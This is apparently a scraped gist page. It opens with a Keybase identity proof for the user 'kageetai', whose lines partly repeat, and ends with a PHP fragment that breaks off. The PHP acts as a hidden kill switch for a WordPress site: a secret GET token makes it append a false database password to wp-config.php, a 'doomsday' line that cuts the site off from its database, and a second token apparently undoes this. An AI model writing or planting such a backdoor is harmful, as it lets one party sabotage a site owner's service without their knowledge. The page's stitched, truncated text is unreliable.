I hereby claim:
- I am kageetai on github.
- I am kageetai (https://keybase.io/kageetai) on keybase.
- I have a public key ASBorwqR69Eef4AjJOf02OGDe9crLQgMvyDszQsg9GZijAo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
| <?php | |
| $file = "wp-config.php"; | |
| $doomsday = "\ndefine('DB_PASSWORD', '12345');\n"; | |
| if ($_GET["p"] == "sfvosovwrs4fj04uwor420hg24rv") { | |
| // add doomsday line to disable access to DB | |
| file_put_contents($file, $doomsday, FILE_APPEND | LOCK_EX); | |
| echo "dommed"; | |
| } else if ($_GET["p"] == "tzj485hwrjfg24hwrjgwf") { | |
| // load the data and delete the line from the array | |
| $lines = file($file); |